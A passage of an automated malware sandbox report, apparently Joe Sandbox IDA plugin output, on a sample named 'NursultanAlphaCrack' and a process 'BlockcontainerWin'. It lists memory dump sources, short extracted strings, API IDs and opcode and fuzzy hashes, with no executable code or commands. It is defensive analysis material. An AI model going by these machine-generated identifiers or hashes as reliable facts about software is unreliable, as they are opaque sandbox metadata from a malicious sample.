                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001CDA55,?), ref: 001CE2B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271
                                                                                        • Opcode ID: 66aa6510a18e24dea08829b7f11e9995561b2a2ecaf8aa5a06d51c006544fb69
                                                                                        • Instruction ID: cc1303cb179ed190785011409da4bd3536694b86426985b1cc06a6c2cd03fa6e
                                                                                        • Opcode Fuzzy Hash: 66aa6510a18e24dea08829b7f11e9995561b2a2ecaf8aa5a06d51c006544fb69
                                                                                        • Instruction Fuzzy Hash: E1C08C3124071066EB30A7757C0EFA36E985B10B51F09044EB292EAAD1DFE5C9C0CBE0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1579490132.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff887d70000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "9B$b4B$r6B$r6B
                                                                                        • API String ID: 0-1939837083
                                                                                        • Opcode ID: 1f9f0c1f95465a2d1c0f7a76db5f3f6c1d704af46f9af3f13a734585a74b238a
                                                                                        • Instruction ID: 4b0f699821e6f2e63deaa8ba424405f5c043f7fc2568ac0e4a5357ba6650dba2
                                                                                        • Opcode Fuzzy Hash: 1f9f0c1f95465a2d1c0f7a76db5f3f6c1d704af46f9af3f13a734585a74b238a
                                                                                        • Instruction Fuzzy Hash: 9471D071D18A8D8FE785DB68D8293A97FF1FBA6344F4002AAD04AE72D6CF781811C701
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B$r6B
                                                                                        • API String ID: 0-1049672097
                                                                                        • Opcode ID: 123a5e4d9a837840b9869c7b3ff0496dbdde06b44d10f4ab061c5858bb2bdf0e
                                                                                        • Instruction ID: f3b7c3e7f3ea875a1bef26874d1297af6f93f713e4c3190e236a511484b898f6
                                                                                        • Opcode Fuzzy Hash: 123a5e4d9a837840b9869c7b3ff0496dbdde06b44d10f4ab061c5858bb2bdf0e
                                                                                        • Instruction Fuzzy Hash: D1C1E434A18A468FE789DB28C0916B4BBE1FF48340F54467DC44EC7A86DF28F891CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B$r6B
                                                                                        • API String ID: 0-1049672097
                                                                                        • Opcode ID: e9462415e1139966e9ffb52240e395c2cbfbfac840b5cdb548d0708315c4efc9
                                                                                        • Instruction ID: b4e91aaa01e4d2681927932f9d57d49c4e262183e4d1d4869eea707996fd517e
                                                                                        • Opcode Fuzzy Hash: e9462415e1139966e9ffb52240e395c2cbfbfac840b5cdb548d0708315c4efc9
                                                                                        • Instruction Fuzzy Hash: A5C1D134A18A468FE749DB28C0916A4BBE1FF49350F5445BAC44EC7E86DF28B851CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0#L$p]L
                                                                                        • API String ID: 0-4069893409
                                                                                        • Opcode ID: e0cee1978afe9fc4f9450477fe6272f123eabe2844baf54862fb32fabd909f43
                                                                                        • Instruction ID: 80413ec457c3bdd714020563db9250df15b272f0ebf7c4ebaf051b4cee798b92
                                                                                        • Opcode Fuzzy Hash: e0cee1978afe9fc4f9450477fe6272f123eabe2844baf54862fb32fabd909f43
                                                                                        • Instruction Fuzzy Hash: 72328334A18A1D8FDB98DB18C899AB877E2FF54354F5441B9D00EC7292DF28EC46CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B$d
                                                                                        • API String ID: 0-1886680559
                                                                                        • Opcode ID: 93457317831c2847aa73b2f4013a9f684360567decbfd0b31b2ab18b8ca82f19
                                                                                        • Instruction ID: eae4f0664d08427bc95117cf4c2a0f11e454b310fdf2878cd32fd633606e521f
                                                                                        • Opcode Fuzzy Hash: 93457317831c2847aa73b2f4013a9f684360567decbfd0b31b2ab18b8ca82f19
                                                                                        • Instruction Fuzzy Hash: 28020F32A08A468FE798DB28D8856B677E1FF95340F1445B9D49AC7287DE28F843C781
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $r6B
                                                                                        • API String ID: 0-2315467569
                                                                                        • Opcode ID: cbb64657cc49e5cf473615acf463a2df641e06dcaaf0db6c6f8d09ff3e346808
                                                                                        • Instruction ID: 8d1abfa8c936564e8eff0a77a43228dc2042e4dc7fe01dc4ae2945343c07463c
                                                                                        • Opcode Fuzzy Hash: cbb64657cc49e5cf473615acf463a2df641e06dcaaf0db6c6f8d09ff3e346808
                                                                                        • Instruction Fuzzy Hash: A3513775E2850A8FDB58DFA8D4546BDBBB1FF48340F1041BAC01AE7296DF386901CB45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $r6B
                                                                                        • API String ID: 0-2315467569
                                                                                        • Opcode ID: e47357fee80cdec012edd1020143b369bb68d5f5526f5f82291cfeda4961a758
                                                                                        • Instruction ID: 941e974c5cf37c5f8ac02a483baa1ad463831dc9559fbe754eacf64055c4259f
                                                                                        • Opcode Fuzzy Hash: e47357fee80cdec012edd1020143b369bb68d5f5526f5f82291cfeda4961a758
                                                                                        • Instruction Fuzzy Hash: 1E514974D0864A8FEB49DBA8D4556BDBBB1FF48340F1048BAC01AE7686DF386806CB54
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B
                                                                                        • API String ID: 0-2860294223
                                                                                        • Opcode ID: 437c453ef4b6f526a1acb047828db2e9a45843ffdb88682968db3576f66b6e34
                                                                                        • Instruction ID: 3786efab296223a09708c1f718e2f1e8b5a174d4b814e7c536ab68c766889e9c
                                                                                        • Opcode Fuzzy Hash: 437c453ef4b6f526a1acb047828db2e9a45843ffdb88682968db3576f66b6e34
                                                                                        • Instruction Fuzzy Hash: 2A312E35F0891A9FDB58EA5CE4919BCB7E2FF54360B50817AD01ED3682DF24B812CB84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B$r6B
                                                                                        • API String ID: 0-2860294223
                                                                                        • Opcode ID: 001a04f55bd56e8bf70666894dd9f57e33b9e133bb431ab6cc93ef1d96e2c431
                                                                                        • Instruction ID: 93359f5e913c229fb88e1083708f919ce3906734238595ce60342e750ce74d6c
                                                                                        • Opcode Fuzzy Hash: 001a04f55bd56e8bf70666894dd9f57e33b9e133bb431ab6cc93ef1d96e2c431
                                                                                        • Instruction Fuzzy Hash: E731E535D0C9464FE799E66898522B8BBE1FF95390F44017AC05EC72C2EF287846C3C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B
                                                                                        • API String ID: 0-3849415641
                                                                                        • Opcode ID: 0cc92c6f3ffab50375b8364896b2eb9a3890295b1781b613b234250c9eb750e5
                                                                                        • Instruction ID: d60d9c08b3b17116cc61f4acf79e85b794be783caa09f93ece0b4454e94daab1
                                                                                        • Opcode Fuzzy Hash: 0cc92c6f3ffab50375b8364896b2eb9a3890295b1781b613b234250c9eb750e5
                                                                                        • Instruction Fuzzy Hash: C2F19134928656CFEB59CF18C4E06B53BA1FF45350F5446BDC84ACB68ADB38E881CB45
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
                                                                                        • Instruction ID: fe326255ca4e15f31ae3a869f0625660fecf35f38ca770afafd2fd142e5d5f3d
                                                                                        • Opcode Fuzzy Hash: 09c5e1ead7f88b72c5e44f497aae68020411925873921990207330fb82e25e87
                                                                                        • Instruction Fuzzy Hash: C0919C31A18A098BDB9CDE08D485A3677E1FF98340F2445BDD84AC729ADE35F843CB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /B
                                                                                        • API String ID: 0-1225004542
                                                                                        • Opcode ID: 649ffc4cc70353d25a3f82034f5277a543734547cfbf498f36922cc94f8f6920
                                                                                        • Instruction ID: 468b58d6cc0019188c5a211052fc0e7d87dc0bd49d4e48d5abf73a7e15f8a5c9
                                                                                        • Opcode Fuzzy Hash: 649ffc4cc70353d25a3f82034f5277a543734547cfbf498f36922cc94f8f6920
                                                                                        • Instruction Fuzzy Hash: 5A716D74D1C64A8EEB94DBA8C8556BCBBB1FF49380F5404BAD00ED7182DF286882C745
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /B
                                                                                        • API String ID: 0-1225004542
                                                                                        • Opcode ID: d30374321739827ada92add5ac7d2cf9f7d7a122c8298923280ce3048866cb06
                                                                                        • Instruction ID: 2c7ff01f2440614c0105bf7ff13fb7e8fc01c948097e48b47e9413899912fbe4
                                                                                        • Opcode Fuzzy Hash: d30374321739827ada92add5ac7d2cf9f7d7a122c8298923280ce3048866cb06
                                                                                        • Instruction Fuzzy Hash: C6718E34D2CA8A8EEB95DBA894546FCBFB1FF45390F5000BAD00ED7192EF286841C745
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B
                                                                                        • API String ID: 0-3849415641
                                                                                        • Opcode ID: 710994505a3dc3adb52c3d4e7b260ce64587bcbf5727d6cc1adf279432b03dbb
                                                                                        • Instruction ID: 02e99eb54397621d097b67defc18e2ced3bfb5e0ec200b2c578439fa8c57487d
                                                                                        • Opcode Fuzzy Hash: 710994505a3dc3adb52c3d4e7b260ce64587bcbf5727d6cc1adf279432b03dbb
                                                                                        • Instruction Fuzzy Hash: 7D414924D1C55B8FE765A728D4103F8BBA1FF54340F9481BED08ECB18ADE2C6A85C785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: b4B
                                                                                        • API String ID: 0-3849415641
                                                                                        • Opcode ID: 7e12a0b821c25d87809eb149ae9ebb9705e4da51b76cd74c586f61d868b33226
                                                                                        • Instruction ID: 1ba694254d125b30378d6362a50ab2618792bda35914a5308547a8d8693afb97
                                                                                        • Opcode Fuzzy Hash: 7e12a0b821c25d87809eb149ae9ebb9705e4da51b76cd74c586f61d868b33226
                                                                                        • Instruction Fuzzy Hash: D0316C30D1CA6A8EF768D6148462AF87BA1FF54350F1449BAC04EC75C6DE2CBE81CB81
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: c01ea4f423395cf83686a33a97ae393c57e57d624dc01cab18de1efd37ec5880
                                                                                        • Instruction ID: 13f9cb3aed3737ce0f31615b428f7e9217ba94a9ac31765c75e376afe246985a
                                                                                        • Opcode Fuzzy Hash: c01ea4f423395cf83686a33a97ae393c57e57d624dc01cab18de1efd37ec5880
                                                                                        • Instruction Fuzzy Hash: D621B435F0C58A4FE758AB6898522B87FE1FF453A0F0401BAD05EC75C2DF186846C355
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: 21bc6daebeb56a6177571e4cc8c4bc2310c84fa8fbb0fbd8b1bee908bb7b518e
                                                                                        • Instruction ID: 5db5ec22b099f4be116214044ae006ee038dfbbc53d98bda56ccac0635a8af92
                                                                                        • Opcode Fuzzy Hash: 21bc6daebeb56a6177571e4cc8c4bc2310c84fa8fbb0fbd8b1bee908bb7b518e
                                                                                        • Instruction Fuzzy Hash: CE213D35E0890A9FDB58EA58D4A19BCB7E2FF89350F108279D01ED3282DF24BC52C785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: r6B
                                                                                        • API String ID: 0-2624010786
                                                                                        • Opcode ID: 07e7fe93ba77b6afc668924a4e086a767f77204cc26374294eb949ba528c7b6b
                                                                                        • Instruction ID: 4b8cdce3075a565882a046e3a75e647336c17d85e39d29b1246e85dd39f30791
                                                                                        • Opcode Fuzzy Hash: 07e7fe93ba77b6afc668924a4e086a767f77204cc26374294eb949ba528c7b6b
                                                                                        • Instruction Fuzzy Hash: E021E434E189199EEB99DA58D495AEDBBF1FF58350F4001BAD00EE3291DF386940CB44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c7cdd590154e408ceb8e98f6aba140e292f9ee8dc36a1a5438379bd6bd4c401
                                                                                        • Instruction ID: eab161b99a0d8428f43e7e7bb4c423757b9bcb85960e2afe71f071301b774ef6
                                                                                        • Opcode Fuzzy Hash: 0c7cdd590154e408ceb8e98f6aba140e292f9ee8dc36a1a5438379bd6bd4c401
                                                                                        • Instruction Fuzzy Hash: 8271D95AE0C2579AF315AA6CA8111FC6F91BF413A1F190177D05ECA0D3EF0C6946C3AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06b5e8fb4718b0d934e3d752f08f8289db53c53df93ec977eb5b1db17935f383
                                                                                        • Instruction ID: 8ce3fbec0fcfae583af69f7e0a9d37d8926bd440a9e6e86bb84a531baa21c2e1
                                                                                        • Opcode Fuzzy Hash: 06b5e8fb4718b0d934e3d752f08f8289db53c53df93ec977eb5b1db17935f383
                                                                                        • Instruction Fuzzy Hash: 11D10E3890CA468FE369DB68D4915B8BBE1FF44780F2445BEC48EC7686DF29B842C745
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6f5b2a55861573d1eaca4144219d771ff188ce74215a89964edaa213b5a16cc
                                                                                        • Instruction ID: 02df0788271cfcc73358bbeb788569708d262864f19f14920c0a229e3cf7ca99
                                                                                        • Opcode Fuzzy Hash: f6f5b2a55861573d1eaca4144219d771ff188ce74215a89964edaa213b5a16cc
                                                                                        • Instruction Fuzzy Hash: A2D1B0745186568FEB49CF18C4D15B47BA1FF49350B6449BDC84B8BA8BCB38F882CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fd8ecbe4fd28edd74e5a35bae23aad42eea08b672cf83761007d00b425d9b2a3
                                                                                        • Instruction ID: 50a14cd0e87a86aa3fe22ba7622a562d48cf8dd183a1ce0bce6929032b874cb7
                                                                                        • Opcode Fuzzy Hash: fd8ecbe4fd28edd74e5a35bae23aad42eea08b672cf83761007d00b425d9b2a3
                                                                                        • Instruction Fuzzy Hash: 46C1BF745186528BEB09CF18C4D15B57BA1FF45350B6449BDC84B8BA8BCF38F882CB89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c8c6b4bc2b679c31884d026fb208d69b93fb6a2ac92933048d106affe5725643
                                                                                        • Instruction ID: 108c4fda8ca386e438e03fdf9342e023e5c57567fbe5d03fe93624437ceb655e
                                                                                        • Opcode Fuzzy Hash: c8c6b4bc2b679c31884d026fb208d69b93fb6a2ac92933048d106affe5725643
                                                                                        • Instruction Fuzzy Hash: 0421D45AD0D597CAF2696A6864311F89E817F417D1F1901B7D00E8E0D3EE4C3985D39E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 47791752c65c61e7840678ecfe3cb33afff072b12c51eeaf2dd832557cf84203
                                                                                        • Instruction ID: 31452c1d0aadf25c504352a0ac57a34a8ca155b320e11eb4f6ac164657fb817d
                                                                                        • Opcode Fuzzy Hash: 47791752c65c61e7840678ecfe3cb33afff072b12c51eeaf2dd832557cf84203
                                                                                        • Instruction Fuzzy Hash: 24811435D0CA468FE3689A28A4561B97BE0FF853D0F14057ED48FC7282DF29B802C796
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 40ea8bab4fb9f0e0f5d1a0fdcbbe6f74d23e03b115ac61d1979c0dd18582e0ad
                                                                                        • Instruction ID: b747449e01a5eff06098ca851d3e6848e390b0cfcc6c6aa21d4c9193d4ff92a4
                                                                                        • Opcode Fuzzy Hash: 40ea8bab4fb9f0e0f5d1a0fdcbbe6f74d23e03b115ac61d1979c0dd18582e0ad
                                                                                        • Instruction Fuzzy Hash: FC71E27590CB468FE3699A6894511B97BE0FF85390F1445BED48FC3183EF29B802C79A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f2f1f05484a97cce031303155af332a8045f6cca563d655b2e828313f4a6273c
                                                                                        • Instruction ID: 5e0b9a1f76aa467fc656b8ebcd4b15216d643b4598603b836f68b350f162b0e3
                                                                                        • Opcode Fuzzy Hash: f2f1f05484a97cce031303155af332a8045f6cca563d655b2e828313f4a6273c
                                                                                        • Instruction Fuzzy Hash: 19917F746286028FEB0DCF18D0D05B13BA1FF49354B5446BDD84B8B68BDB38E892CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23e2f7ba8838ad5a3b48432d5f709194e464a3552e851f8b77fcac274d18f248
                                                                                        • Instruction ID: a5490e83aa4148c5136e6bbe69380d71e32c409696900ee0bc58b859c6615690
                                                                                        • Opcode Fuzzy Hash: 23e2f7ba8838ad5a3b48432d5f709194e464a3552e851f8b77fcac274d18f248
                                                                                        • Instruction Fuzzy Hash: F071287990C54A8FE768DF1C88565B83BD0FF48790F1402B9D49EC79A2DF2CA80AC785
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 42d8c12f9499fb02def31a6cc28498901dbf98015951db753fb3acc6bfa30703
                                                                                        • Instruction ID: 6056436885d66bc4cb994b75cbd107f87383527a08c04777b486bb4003600df5
                                                                                        • Opcode Fuzzy Hash: 42d8c12f9499fb02def31a6cc28498901dbf98015951db753fb3acc6bfa30703
                                                                                        • Instruction Fuzzy Hash: 547147BD94C4494FE76CDA1888965B83BD0FF94391F1002F9D49EC76A6EF38A806C785
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6d31504753a30675b869bc133275c658973f3f40d5af0a83050d1945ca4f9715
                                                                                        • Instruction ID: 07cc5bed7ad39ade40ea63cef1e9ebc58118f38b30235264831de5856fa60f9e
                                                                                        • Opcode Fuzzy Hash: 6d31504753a30675b869bc133275c658973f3f40d5af0a83050d1945ca4f9715
                                                                                        • Instruction Fuzzy Hash: 18716A3998C54A8FE768DA1889579B43FD0FF48390F0402BDD4AEC75A2DF29A806C785
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7ff888150000_BlockcontainerWin.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bb33735a5cba58df20508a0adafeaf67da36fdd9e1123cd2fe36b8750f01f1cc
                                                                                        • Instruction ID: 4bedc9d7d8200001ffe911d45de14f1a74b21f183be4c4f84a5497298177ca4b
                                                                                        • Opcode Fuzzy Hash: bb33735a5cba58df20508a0adafeaf67da36fdd9e1123cd2fe36b8750f01f1cc
                                                                                        • Instruction Fuzzy Hash: 24917F746286118FEB0CCF08D0D15B53BA1FF49350F5446BDD84B8B68ADB38E892CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1584596742.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
